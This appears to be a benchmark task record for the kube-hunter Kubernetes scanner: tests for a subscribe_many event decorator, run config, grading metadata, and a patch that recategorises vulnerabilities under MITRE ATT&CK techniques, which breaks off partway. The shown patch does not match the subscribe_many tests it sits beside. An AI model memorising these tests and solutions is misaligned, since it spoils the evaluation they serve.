diff --git a/tests/core/test_subscribe.py b/tests/core/test_subscribe.py index f01ef00..6dc0fc8 100644 --- a/tests/core/test_subscribe.py +++ b/tests/core/test_subscribe.py @@ -6,6 +6,8 @@ from kube_hunter.core.events.types import Event, Service from kube_hunter.core.events import handler counter = 0 +first_run = True + set_config(Config()) @@ -19,6 +21,16 @@ class RegularEvent(Service, Event): Service.__init__(self, "Test Service") +class AnotherRegularEvent(Service, Event): + def __init__(self): + Service.__init__(self, "Test Service (another)") + + +class DifferentRegularEvent(Service, Event): + def __init__(self): + Service.__init__(self, "Test Service (different)") + + @handler.subscribe_once(OnceOnlyEvent) class OnceHunter(Hunter): def __init__(self, event): @@ -33,8 +45,36 @@ class RegularHunter(Hunter): counter += 1 +@handler.subscribe_many([DifferentRegularEvent, AnotherRegularEvent]) +class SmartHunter(Hunter): + def __init__(self, events): + global counter, first_run + counter += 1 + + # we add an attribute on the second scan. + # here we test that we get the latest event + different_event = events.get_by_class(DifferentRegularEvent) + if first_run: + first_run = False + assert not different_event.new_value + else: + assert different_event.new_value + + +@handler.subscribe_many([DifferentRegularEvent, AnotherRegularEvent]) +class SmartHunter2(Hunter): + def __init__(self, events): + global counter + counter += 1 + + # check if we can access the events + assert events.get_by_class(DifferentRegularEvent).__class__ == DifferentRegularEvent + assert events.get_by_class(AnotherRegularEvent).__class__ == AnotherRegularEvent + + def test_subscribe_mechanism(): global counter + counter = 0 # first test normal subscribe and publish works handler.publish_event(RegularEvent()) @@ -43,13 +83,47 @@ def test_subscribe_mechanism(): time.sleep(0.02) assert counter == 3 + + +def test_subscribe_once_mechanism(): + global counter + counter = 0 + + # testing the multiple subscription mechanism + handler.publish_event(OnceOnlyEvent()) + + time.sleep(0.02) + assert counter == 1 counter = 0 - # testing the subscribe_once mechanism handler.publish_event(OnceOnlyEvent()) handler.publish_event(OnceOnlyEvent()) handler.publish_event(OnceOnlyEvent()) + time.sleep(0.02) + + assert counter == 0 + + +def test_subscribe_many_mechanism(): + global counter + counter = 0 + + # testing the multiple subscription mechanism + handler.publish_event(DifferentRegularEvent()) + handler.publish_event(DifferentRegularEvent()) + handler.publish_event(DifferentRegularEvent()) + handler.publish_event(DifferentRegularEvent()) + handler.publish_event(DifferentRegularEvent()) + handler.publish_event(AnotherRegularEvent()) time.sleep(0.02) - # should have been triggered once - assert counter == 1 + # We expect SmartHunter and SmartHunter2 to be executed once. hence the counter should be 2 + assert counter == 2 + counter = 0 + + # Test using most recent event + newer_version_event = DifferentRegularEvent() + newer_version_event.new_value = True + handler.publish_event(newer_version_event) + + assert counter == 2
[ "tests/core/test_subscribe.py::test_subscribe_mechanism", "tests/core/test_subscribe.py::test_subscribe_once_mechanism", "tests/core/test_subscribe.py::test_subscribe_many_mechanism" ]
[]
Method: EventQueue.subscribe_many(self, events: List[Type[Event]], hook: Optional[Type[Hunter]]=None, predicates: Optional[List[Callable]]=None) Location: kube_hunter.core.events.handler.EventQueue.subscribe_many Inputs: - **events** – list of event classes that the hunter requires. - **hook** – (internal) the hunter class when used programmatically; omitted when used as a decorator. - **predicates** – optional list of callables, one per event, returning bool to filter publishing. Outputs: Returns a decorator that registers the given hunter for the specified multiple‑event subscription and finally returns the original hunter class unchanged. Description: Registers a hunter to be triggered each time a new combination of the specified events has been published, using a `MultipleEventsContainer` to deliver the latest versions of each required event. Function: MultipleEventsContainer.get_by_class(event_class: Type[Event]) → Optional[Event] Location: kube_hunter.core.events.types.MultipleEventsContainer.get_by_class Inputs: - **event_class** – the class of the event to retrieve from the container. Outputs: Returns the first stored event instance whose class exactly matches *event_class*, or None if not present. Description: Allows a hunter that subscribed via `subscribe_many` to extract a specific event instance from the `MultipleEventsContainer` passed to its constructor.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -r requirements-dev.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/core/test_subscribe.py" }
{ "num_modified_files": 2, "num_modified_lines": 237, "pr_author": "danielsagi", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests a new @handler.subscribe_many decorator and a MultipleEventsContainer to allow hunters to fire only after a set of events have all occurred, with tests defining the expected execution counts and event access. The provided tests directly verify this behavior and match the specification, with no hidden requirements or external references. There are no signals of test‑suite coupling, implicit naming, external URLs, ambiguous specs, unrelated patch artifacts, or required domain knowledge beyond the repo. Therefore the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
473e4fe2b57d3e91b91777de0ed65d13658ae9cb
2021-08-19 16:56:12
aquasecurity__kube-hunter-474
diff --git a/README.md b/README.md index 6100636..0d59407 100644 --- a/README.md +++ b/README.md @@ -141,7 +141,7 @@ Available dispatch methods are: * KUBEHUNTER_HTTP_DISPATCH_URL (defaults to: https://localhost) * KUBEHUNTER_HTTP_DISPATCH_METHOD (defaults to: POST) -### Advanced Usage +### Advanced Usage #### Azure Quick Scanning When running **as a Pod in an Azure or AWS environment**, kube-hunter will fetch subnets from the Instance Metadata Service. Naturally this makes the discovery process take longer. To hardlimit subnet scanning to a `/24` CIDR, use the `--quick` option. diff --git a/kube_hunter/core/events/types.py b/kube_hunter/core/events/types.py index aaffd35..030ca32 100644 --- a/kube_hunter/core/events/types.py +++ b/kube_hunter/core/events/types.py @@ -3,15 +3,32 @@ import threading import requests from kube_hunter.conf import get_config -from kube_hunter.core.types import ( - InformationDisclosure, - DenialOfService, - RemoteCodeExec, - IdentityTheft, - PrivilegeEscalation, - AccessRisk, - UnauthenticatedAccess, - KubernetesCluster, +from kube_hunter.core.types import KubernetesCluster +from kube_hunter.core.types.vulnerabilities import ( + GeneralSensitiveInformationTechnique, + ExposedSensitiveInterfacesTechnique, + MountServicePrincipalTechnique, + ListK8sSecretsTechnique, + AccessContainerServiceAccountTechnique, + AccessK8sApiServerTechnique, + AccessKubeletAPITechnique, + AccessK8sDashboardTechnique, + InstanceMetadataApiTechnique, + ExecIntoContainerTechnique, + SidecarInjectionTechnique, + NewContainerTechnique, + GeneralPersistenceTechnique, + HostPathMountPrivilegeEscalationTechnique, + PrivilegedContainerTechnique, + ClusterAdminBindingTechnique, + ARPPoisoningTechnique, + CoreDNSPoisoningTechnique, + DataDestructionTechnique, + GeneralDefenseEvasionTechnique, + ConnectFromProxyServerTechnique, + CVERemoteCodeExecutionCategory, + CVEPrivilegeEscalationCategory, + CVEDenialOfServiceTechnique, ) logger = logging.getLogger(__name__) @@ -102,13 +119,30 @@ class Service: class Vulnerability: severity = dict( { - InformationDisclosure: "medium", - DenialOfService: "medium", - RemoteCodeExec: "high", - IdentityTheft: "high", - PrivilegeEscalation: "high", - AccessRisk: "low", - UnauthenticatedAccess: "low", + GeneralSensitiveInformationTechnique: "low", + ExposedSensitiveInterfacesTechnique: "high", + MountServicePrincipalTechnique: "high", + ListK8sSecretsTechnique: "high", + AccessContainerServiceAccountTechnique: "low", + AccessK8sApiServerTechnique: "medium", + AccessKubeletAPITechnique: "medium", + AccessK8sDashboardTechnique: "medium", + InstanceMetadataApiTechnique: "high", + ExecIntoContainerTechnique: "high", + SidecarInjectionTechnique: "high", + NewContainerTechnique: "high", + GeneralPersistenceTechnique: "high", + HostPathMountPrivilegeEscalationTechnique: "high", + PrivilegedContainerTechnique: "high", + ClusterAdminBindingTechnique: "high", + ARPPoisoningTechnique: "medium", + CoreDNSPoisoningTechnique: "high", + DataDestructionTechnique: "high", + GeneralDefenseEvasionTechnique: "high", + ConnectFromProxyServerTechnique: "low", + CVERemoteCodeExecutionCategory: "high", + CVEPrivilegeEscalationCategory: "high", + CVEDenialOfServiceTechnique: "medium", } ) @@ -213,18 +247,21 @@ class ReportDispatched(Event): class K8sVersionDisclosure(Vulnerability, Event): """The kubernetes version could be obtained from the {} endpoint""" - def __init__(self, version, from_endpoint, extra_info=""): + def __init__(self, version, from_endpoint, extra_info="", category=None): Vulnerability.__init__( self, KubernetesCluster, "K8s Version Disclosure", - category=InformationDisclosure, + category=ExposedSensitiveInterfacesTechnique, vid="KHV002", ) self.version = version self.from_endpoint = from_endpoint self.extra_info = extra_info self.evidence = version + # depending from where the version came from, we might want to also override the category + if category: + self.category = category def explain(self): return self.__doc__.format(self.from_endpoint) + self.extra_info diff --git a/kube_hunter/core/types.py b/kube_hunter/core/types.py deleted file mode 100644 index c4612e9..0000000 --- a/kube_hunter/core/types.py +++ /dev/null @@ -1,94 +0,0 @@ -class HunterBase: - publishedVulnerabilities = 0 - - @staticmethod - def parse_docs(docs): - """returns tuple of (name, docs)""" - if not docs: - return __name__, "<no documentation>" - docs = docs.strip().split("\n") - for i, line in enumerate(docs): - docs[i] = line.strip() - return docs[0], " ".join(docs[1:]) if len(docs[1:]) else "<no documentation>" - - @classmethod - def get_name(cls): - name, _ = cls.parse_docs(cls.__doc__) - return name - - def publish_event(self, event): - handler.publish_event(event, caller=self) - - -class ActiveHunter(HunterBase): - pass - - -class Hunter(HunterBase): - pass - - -class Discovery(HunterBase): - pass - - -class KubernetesCluster: - """Kubernetes Cluster""" - - name = "Kubernetes Cluster" - - -class KubectlClient: - """The kubectl client binary is used by the user to interact with the cluster""" - - name = "Kubectl Client" - - -class Kubelet(KubernetesCluster): - """The kubelet is the primary "node agent" that runs on each node""" - - name = "Kubelet" - - -class AWS(KubernetesCluster): - """AWS Cluster""" - - name = "AWS" - - -class Azure(KubernetesCluster): - """Azure Cluster""" - - name = "Azure" - - -class InformationDisclosure: - name = "Information Disclosure" - - -class RemoteCodeExec: - name = "Remote Code Execution" - - -class IdentityTheft: - name = "Identity Theft" - - -class UnauthenticatedAccess: - name = "Unauthenticated Access" - - -class AccessRisk: - name = "Access Risk" - - -class PrivilegeEscalation(KubernetesCluster): - name = "Privilege Escalation" - - -class DenialOfService: - name = "Denial of Service" - - -# import is in the bottom to break import loops -from .events import handler # noqa diff --git a/kube_hunter/core/types/__init__.py b/kube_hunter/core/types/__init__.py new file mode 100644 index 0000000..0927486 --- /dev/null +++ b/kube_hunter/core/types/__init__.py @@ -0,0 +1,4 @@ +# flake8: noqa: E402 +from .hunters import * +from .components import * +from .vulnerabilities import * diff --git a/kube_hunter/core/types/components.py b/kube_hunter/core/types/components.py new file mode 100644 index 0000000..22f89f9 --- /dev/null +++ b/kube_hunter/core/types/components.py @@ -0,0 +1,28 @@ +class KubernetesCluster: + """Kubernetes Cluster""" + + name = "Kubernetes Cluster" + + +class KubectlClient: + """The kubectl client binary is used by the user to interact with the cluster""" + + name = "Kubectl Client" + + +class Kubelet(KubernetesCluster): + """The kubelet is the primary "node agent" that runs on each node""" + + name = "Kubelet" + + +class AWS(KubernetesCluster): + """AWS Cluster""" + + name = "AWS" + + +class Azure(KubernetesCluster): + """Azure Cluster""" + + name = "Azure" diff --git a/kube_hunter/core/types/hunters.py b/kube_hunter/core/types/hunters.py new file mode 100644 index 0000000..0d7e410 --- /dev/null +++ b/kube_hunter/core/types/hunters.py @@ -0,0 +1,36 @@ +class HunterBase: + publishedVulnerabilities = 0 + + @staticmethod + def parse_docs(docs): + """returns tuple of (name, docs)""" + if not docs: + return __name__, "<no documentation>" + docs = docs.strip().split("\n") + for i, line in enumerate(docs): + docs[i] = line.strip() + return docs[0], " ".join(docs[1:]) if len(docs[1:]) else "<no documentation>" + + @classmethod + def get_name(cls): + name, _ = cls.parse_docs(cls.__doc__) + return name + + def publish_event(self, event): + # Import here to avoid circular import from events package. + # imports are cached in python so this should not affect runtime + from ..events import handler # noqa + + handler.publish_event(event, caller=self) + + +class ActiveHunter(HunterBase): + pass + + +class Hunter(HunterBase): + pass + + +class Discovery(HunterBase): + pass diff --git a/kube_hunter/core/types/vulnerabilities.py b/kube_hunter/core/types/vulnerabilities.py new file mode 100644 index 0000000..d3a8b93 --- /dev/null +++ b/kube_hunter/core/types/vulnerabilities.py @@ -0,0 +1,188 @@ +""" +Vulnerabilities are divided into 2 main categories. + +MITRE Category +-------------- +Vulnerability that correlates to a method in the official MITRE ATT&CK matrix for kubernetes + +CVE Category +------------- +"General" category definition. The category is usually determined by the severity of the CVE +""" + + +class MITRECategory: + @classmethod + def get_name(cls): + """ + Returns the full name of MITRE technique: <MITRE CATEGORY> // <MITRE TECHNIQUE> + Should only be used on a direct technique class at the end of the MITRE inheritance chain. + + Example inheritance: + MITRECategory -> InitialAccessCategory -> ExposedSensitiveInterfacesTechnique + """ + inheritance_chain = cls.__mro__ + if len(inheritance_chain) >= 4: + # -3 == index of mitreCategory class. (object class is first) + mitre_category_class = inheritance_chain[-3] + return f"{mitre_category_class.name} // {cls.name}" + + +class CVECategory: + @classmethod + def get_name(cls): + """ + Returns the full name of the category: CVE // <CVE Category name> + """ + return f"CVE // {cls.name}" + + +""" +MITRE ATT&CK Technique Categories +""" + + +class InitialAccessCategory(MITRECategory): + name = "Initial Access" + + +class ExecutionCategory(MITRECategory): + name = "Execution" + + +class PersistenceCategory(MITRECategory): + name = "Persistence" + + +class PrivilegeEscalationCategory(MITRECategory): + name = "Privilege Escalation" + + +class DefenseEvasionCategory(MITRECategory): + name = "Defense Evasion" + + +class CredentialAccessCategory(MITRECategory): + name = "Credential Access" + + +class DiscoveryCategory(MITRECategory): + name = "Discovery" + + +class LateralMovementCategory(MITRECategory): + name = "Lateral Movement" + + +class CollectionCategory(MITRECategory): + name = "Collection" + + +class ImpactCategory(MITRECategory): + name = "Impact" + + +""" +MITRE ATT&CK Techniques +""" + + +class GeneralSensitiveInformationTechnique(InitialAccessCategory): + name = "General Sensitive Information" + + +class ExposedSensitiveInterfacesTechnique(InitialAccessCategory): + name = "Exposed sensitive interfaces" + + +class MountServicePrincipalTechnique(CredentialAccessCategory): + name = "Mount service principal" + + +class ListK8sSecretsTechnique(CredentialAccessCategory): + name = "List K8S secrets" + + +class AccessContainerServiceAccountTechnique(CredentialAccessCategory): + name = "Access container service account" + + +class AccessK8sApiServerTechnique(DiscoveryCategory): + name = "Access the K8S API Server" + + +class AccessKubeletAPITechnique(DiscoveryCategory): + name = "Access Kubelet API" + + +class AccessK8sDashboardTechnique(DiscoveryCategory): + name = "Access Kubernetes Dashboard" + + +class InstanceMetadataApiTechnique(DiscoveryCategory): + name = "Instance Metadata API" + + +class ExecIntoContainerTechnique(ExecutionCategory): + name = "Exec into container" + + +class SidecarInjectionTechnique(ExecutionCategory): + name = "Sidecar injection" + + +class NewContainerTechnique(ExecutionCategory): + name = "New container" + + +class GeneralPersistenceTechnique(PersistenceCategory): + name = "General Peristence" + + +class HostPathMountPrivilegeEscalationTechnique(PrivilegeEscalationCategory): + name = "hostPath mount" + + +class PrivilegedContainerTechnique(PrivilegeEscalationCategory): + name = "Privileged container" + + +class ClusterAdminBindingTechnique(PrivilegeEscalationCategory): + name = "Cluser-admin binding" + + +class ARPPoisoningTechnique(LateralMovementCategory): + name = "ARP poisoning and IP spoofing" + + +class CoreDNSPoisoningTechnique(LateralMovementCategory): + name = "CoreDNS poisoning" + + +class DataDestructionTechnique(ImpactCategory): + name = "Data Destruction" + + +class GeneralDefenseEvasionTechnique(DefenseEvasionCategory): + name = "General Defense Evasion" + + +class ConnectFromProxyServerTechnique(DefenseEvasionCategory): + name = "Connect from Proxy server" + + +""" +CVE Categories +""" + + +class CVERemoteCodeExecutionCategory(CVECategory): + name = "Remote Code Execution (CVE)" + + +class CVEPrivilegeEscalationCategory(CVECategory): + name = "Privilege Escalation (CVE)" + + +class CVEDenialOfServiceTechnique(CVECategory): + name = "Denial Of Service (CVE)" diff --git a/kube_hunter/modules/discovery/hosts.py b/kube_hunter/modules/discovery/hosts.py index 5923acc..76d0b40 100644 --- a/kube_hunter/modules/discovery/hosts.py +++ b/kube_hunter/modules/discovery/hosts.py @@ -11,7 +11,7 @@ from kube_hunter.conf import get_config from kube_hunter.modules.discovery.kubernetes_client import list_all_k8s_cluster_nodes from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, NewHostEvent, Vulnerability -from kube_hunter.core.types import Discovery, InformationDisclosure, AWS, Azure +from kube_hunter.core.types import Discovery, AWS, Azure, InstanceMetadataApiTechnique logger = logging.getLogger(__name__) @@ -55,7 +55,7 @@ class AWSMetadataApi(Vulnerability, Event): self, AWS, "AWS Metadata Exposure", - category=InformationDisclosure, + category=InstanceMetadataApiTechnique, vid="KHV053", ) self.cidr = cidr @@ -70,7 +70,7 @@ class AzureMetadataApi(Vulnerability, Event): self, Azure, "Azure Metadata Exposure", - category=InformationDisclosure, + category=InstanceMetadataApiTechnique, vid="KHV003", ) self.cidr = cidr diff --git a/kube_hunter/modules/hunting/aks.py b/kube_hunter/modules/hunting/aks.py index e5c4a16..6c0d0a9 100644 --- a/kube_hunter/modules/hunting/aks.py +++ b/kube_hunter/modules/hunting/aks.py @@ -7,7 +7,7 @@ from kube_hunter.conf import get_config from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler, SecureKubeletPortHunter from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, Vulnerability -from kube_hunter.core.types import Hunter, ActiveHunter, IdentityTheft, Azure +from kube_hunter.core.types import Hunter, ActiveHunter, MountServicePrincipalTechnique, Azure logger = logging.getLogger(__name__) @@ -20,7 +20,7 @@ class AzureSpnExposure(Vulnerability, Event): self, Azure, "Azure SPN Exposure", - category=IdentityTheft, + category=MountServicePrincipalTechnique, vid="KHV004", ) self.container = container diff --git a/kube_hunter/modules/hunting/apiserver.py b/kube_hunter/modules/hunting/apiserver.py index 5e4aa96..8af3dd8 100644 --- a/kube_hunter/modules/hunting/apiserver.py +++ b/kube_hunter/modules/hunting/apiserver.py @@ -8,10 +8,15 @@ from kube_hunter.modules.discovery.apiserver import ApiServer from kube_hunter.core.events import handler from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure from kube_hunter.core.types import Hunter, ActiveHunter, KubernetesCluster -from kube_hunter.core.types import ( - AccessRisk, - InformationDisclosure, - UnauthenticatedAccess, +from kube_hunter.core.types.vulnerabilities import ( + AccessK8sApiServerTechnique, + ExposedSensitiveInterfacesTechnique, + GeneralDefenseEvasionTechnique, + DataDestructionTechnique, + ClusterAdminBindingTechnique, + NewContainerTechnique, + PrivilegedContainerTechnique, + SidecarInjectionTechnique, ) logger = logging.getLogger(__name__) @@ -24,10 +29,10 @@ class ServerApiAccess(Vulnerability, Event): def __init__(self, evidence, using_token): if using_token: name = "Access to API using service account token" - category = InformationDisclosure + category = AccessK8sApiServerTechnique else: name = "Unauthenticated access to API" - category = UnauthenticatedAccess + category = ExposedSensitiveInterfacesTechnique Vulnerability.__init__( self, KubernetesCluster, @@ -44,7 +49,7 @@ class ServerApiHTTPAccess(Vulnerability, Event): def __init__(self, evidence): name = "Insecure (HTTP) access to API" - category = UnauthenticatedAccess + category = ExposedSensitiveInterfacesTechnique Vulnerability.__init__( self, KubernetesCluster, @@ -59,7 +64,7 @@ class ApiInfoDisclosure(Vulnerability, Event): """Information Disclosure depending upon RBAC permissions and Kube-Cluster Setup""" def __init__(self, evidence, using_token, name): - category = InformationDisclosure + category = AccessK8sApiServerTechnique if using_token: name += " using default service account token" else: @@ -111,7 +116,7 @@ class CreateANamespace(Vulnerability, Event): self, KubernetesCluster, name="Created a namespace", - category=AccessRisk, + category=GeneralDefenseEvasionTechnique, ) self.evidence = evidence @@ -125,7 +130,7 @@ class DeleteANamespace(Vulnerability, Event): self, KubernetesCluster, name="Delete a namespace", - category=AccessRisk, + category=DataDestructionTechnique, ) self.evidence = evidence @@ -136,7 +141,7 @@ class CreateARole(Vulnerability, Event): """ def __init__(self, evidence): - Vulnerability.__init__(self, KubernetesCluster, name="Created a role", category=AccessRisk) + Vulnerability.__init__(self, KubernetesCluster, name="Created a role", category=GeneralDefenseEvasionTechnique) self.evidence = evidence @@ -150,7 +155,7 @@ class CreateAClusterRole(Vulnerability, Event): self, KubernetesCluster, name="Created a cluster role", - category=AccessRisk, + category=ClusterAdminBindingTechnique, ) self.evidence = evidence @@ -165,7 +170,7 @@ class PatchARole(Vulnerability, Event): self, KubernetesCluster, name="Patched a role", - category=AccessRisk, + category=ClusterAdminBindingTechnique, ) self.evidence = evidence @@ -180,7 +185,7 @@ class PatchAClusterRole(Vulnerability, Event): self, KubernetesCluster, name="Patched a cluster role", - category=AccessRisk, + category=ClusterAdminBindingTechnique, ) self.evidence = evidence @@ -193,7 +198,7 @@ class DeleteARole(Vulnerability, Event): self, KubernetesCluster, name="Deleted a role", - category=AccessRisk, + category=DataDestructionTechnique, ) self.evidence = evidence @@ -206,7 +211,7 @@ class DeleteAClusterRole(Vulnerability, Event): self, KubernetesCluster, name="Deleted a cluster role", - category=AccessRisk, + category=DataDestructionTechnique, ) self.evidence = evidence @@ -219,7 +224,7 @@ class CreateAPod(Vulnerability, Event): self, KubernetesCluster, name="Created A Pod", - category=AccessRisk, + category=NewContainerTechnique, ) self.evidence = evidence @@ -232,7 +237,7 @@ class CreateAPrivilegedPod(Vulnerability, Event): self, KubernetesCluster, name="Created A PRIVILEGED Pod", - category=AccessRisk, + category=PrivilegedContainerTechnique, ) self.evidence = evidence @@ -245,7 +250,7 @@ class PatchAPod(Vulnerability, Event): self, KubernetesCluster, name="Patched A Pod", - category=AccessRisk, + category=SidecarInjectionTechnique, ) self.evidence = evidence @@ -258,7 +263,7 @@ class DeleteAPod(Vulnerability, Event): self, KubernetesCluster, name="Deleted A Pod", - category=AccessRisk, + category=DataDestructionTechnique, ) self.evidence = evidence @@ -377,7 +382,7 @@ class AccessApiServerWithToken(AccessApiServer): super().__init__(event) assert self.event.auth_token self.headers = {"Authorization": f"Bearer {self.event.auth_token}"} - self.category = InformationDisclosure + self.category = AccessK8sApiServerTechnique self.with_token = True diff --git a/kube_hunter/modules/hunting/arp.py b/kube_hunter/modules/hunting/arp.py index 6ae8c35..0a37f1d 100644 --- a/kube_hunter/modules/hunting/arp.py +++ b/kube_hunter/modules/hunting/arp.py @@ -5,7 +5,7 @@ from scapy.all import ARP, IP, ICMP, Ether, sr1, srp from kube_hunter.conf import get_config from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, Vulnerability -from kube_hunter.core.types import ActiveHunter, KubernetesCluster, IdentityTheft +from kube_hunter.core.types import ActiveHunter, KubernetesCluster, ARPPoisoningTechnique from kube_hunter.modules.hunting.capabilities import CapNetRawEnabled logger = logging.getLogger(__name__) @@ -20,7 +20,7 @@ class PossibleArpSpoofing(Vulnerability, Event): self, KubernetesCluster, "Possible Arp Spoof", - category=IdentityTheft, + category=ARPPoisoningTechnique, vid="KHV020", ) diff --git a/kube_hunter/modules/hunting/capabilities.py b/kube_hunter/modules/hunting/capabilities.py index 802ae93..656618b 100644 --- a/kube_hunter/modules/hunting/capabilities.py +++ b/kube_hunter/modules/hunting/capabilities.py @@ -4,7 +4,7 @@ import logging from kube_hunter.modules.discovery.hosts import RunningAsPodEvent from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, Vulnerability -from kube_hunter.core.types import Hunter, AccessRisk, KubernetesCluster +from kube_hunter.core.types import Hunter, ARPPoisoningTechnique, KubernetesCluster logger = logging.getLogger(__name__) @@ -20,7 +20,7 @@ class CapNetRawEnabled(Event, Vulnerability): self, KubernetesCluster, name="CAP_NET_RAW Enabled", - category=AccessRisk, + category=ARPPoisoningTechnique, ) diff --git a/kube_hunter/modules/hunting/certificates.py b/kube_hunter/modules/hunting/certificates.py index db12e66..ee60c98 100644 --- a/kube_hunter/modules/hunting/certificates.py +++ b/kube_hunter/modules/hunting/certificates.py @@ -3,7 +3,7 @@ import logging import base64 import re -from kube_hunter.core.types import Hunter, KubernetesCluster, InformationDisclosure +from kube_hunter.core.types import Hunter, KubernetesCluster, GeneralSensitiveInformationTechnique from kube_hunter.core.events import handler from kube_hunter.core.events.types import Vulnerability, Event, Service @@ -21,7 +21,7 @@ class CertificateEmail(Vulnerability, Event): self, KubernetesCluster, "Certificate Includes Email Address", - category=InformationDisclosure, + category=GeneralSensitiveInformationTechnique, vid="KHV021", ) self.email = email diff --git a/kube_hunter/modules/hunting/cves.py b/kube_hunter/modules/hunting/cves.py index 2e8ffc8..7e8d8a9 100644 --- a/kube_hunter/modules/hunting/cves.py +++ b/kube_hunter/modules/hunting/cves.py @@ -6,11 +6,11 @@ from kube_hunter.core.events import handler from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure from kube_hunter.core.types import ( Hunter, - KubernetesCluster, - RemoteCodeExec, - PrivilegeEscalation, - DenialOfService, KubectlClient, + KubernetesCluster, + CVERemoteCodeExecutionCategory, + CVEPrivilegeEscalationCategory, + CVEDenialOfServiceTechnique, ) from kube_hunter.modules.discovery.kubectl import KubectlClientEvent @@ -25,7 +25,7 @@ class ServerApiVersionEndPointAccessPE(Vulnerability, Event): self, KubernetesCluster, name="Critical Privilege Escalation CVE", - category=PrivilegeEscalation, + category=CVEPrivilegeEscalationCategory, vid="KHV022", ) self.evidence = evidence @@ -40,7 +40,7 @@ class ServerApiVersionEndPointAccessDos(Vulnerability, Event): self, KubernetesCluster, name="Denial of Service to Kubernetes API Server", - category=DenialOfService, + category=CVEDenialOfServiceTechnique, vid="KHV023", ) self.evidence = evidence @@ -55,7 +55,7 @@ class PingFloodHttp2Implementation(Vulnerability, Event): self, KubernetesCluster, name="Possible Ping Flood Attack", - category=DenialOfService, + category=CVEDenialOfServiceTechnique, vid="KHV024", ) self.evidence = evidence @@ -70,7 +70,7 @@ class ResetFloodHttp2Implementation(Vulnerability, Event): self, KubernetesCluster, name="Possible Reset Flood Attack", - category=DenialOfService, + category=CVEDenialOfServiceTechnique, vid="KHV025", ) self.evidence = evidence @@ -85,7 +85,7 @@ class ServerApiClusterScopedResourcesAccess(Vulnerability, Event): self, KubernetesCluster, name="Arbitrary Access To Cluster Scoped Resources", - category=PrivilegeEscalation, + category=CVEPrivilegeEscalationCategory, vid="KHV026", ) self.evidence = evidence @@ -100,7 +100,7 @@ class IncompleteFixToKubectlCpVulnerability(Vulnerability, Event): self, KubectlClient, "Kubectl Vulnerable To CVE-2019-11246", - category=RemoteCodeExec, + category=CVERemoteCodeExecutionCategory, vid="KHV027", ) self.binary_version = binary_version @@ -116,7 +116,7 @@ class KubectlCpVulnerability(Vulnerability, Event): self, KubectlClient, "Kubectl Vulnerable To CVE-2019-1002101", - category=RemoteCodeExec, + category=CVERemoteCodeExecutionCategory, vid="KHV028", ) self.binary_version = binary_version diff --git a/kube_hunter/modules/hunting/dashboard.py b/kube_hunter/modules/hunting/dashboard.py index bb31b24..956e120 100644 --- a/kube_hunter/modules/hunting/dashboard.py +++ b/kube_hunter/modules/hunting/dashboard.py @@ -3,7 +3,7 @@ import json import requests from kube_hunter.conf import get_config -from kube_hunter.core.types import Hunter, RemoteCodeExec, KubernetesCluster +from kube_hunter.core.types import Hunter, AccessK8sDashboardTechnique, KubernetesCluster from kube_hunter.core.events import handler from kube_hunter.core.events.types import Vulnerability, Event from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent @@ -19,7 +19,7 @@ class DashboardExposed(Vulnerability, Event): self, KubernetesCluster, "Dashboard Exposed", - category=RemoteCodeExec, + category=AccessK8sDashboardTechnique, vid="KHV029", ) self.evidence = "nodes: {}".format(" ".join(nodes)) if nodes else None diff --git a/kube_hunter/modules/hunting/dns.py b/kube_hunter/modules/hunting/dns.py index 6635b37..b0e037b 100644 --- a/kube_hunter/modules/hunting/dns.py +++ b/kube_hunter/modules/hunting/dns.py @@ -6,7 +6,7 @@ from scapy.all import IP, ICMP, UDP, DNS, DNSQR, ARP, Ether, sr1, srp1, srp from kube_hunter.conf import get_config from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, Vulnerability -from kube_hunter.core.types import ActiveHunter, KubernetesCluster, IdentityTheft +from kube_hunter.core.types import ActiveHunter, KubernetesCluster, CoreDNSPoisoningTechnique from kube_hunter.modules.hunting.arp import PossibleArpSpoofing logger = logging.getLogger(__name__) @@ -21,7 +21,7 @@ class PossibleDnsSpoofing(Vulnerability, Event): self, KubernetesCluster, "Possible DNS Spoof", - category=IdentityTheft, + category=CoreDNSPoisoningTechnique, vid="KHV030", ) self.kubedns_pod_ip = kubedns_pod_ip diff --git a/kube_hunter/modules/hunting/etcd.py b/kube_hunter/modules/hunting/etcd.py index 9118bc9..f087567 100644 --- a/kube_hunter/modules/hunting/etcd.py +++ b/kube_hunter/modules/hunting/etcd.py @@ -8,10 +8,10 @@ from kube_hunter.core.types import ( ActiveHunter, Hunter, KubernetesCluster, - InformationDisclosure, - RemoteCodeExec, - UnauthenticatedAccess, - AccessRisk, + 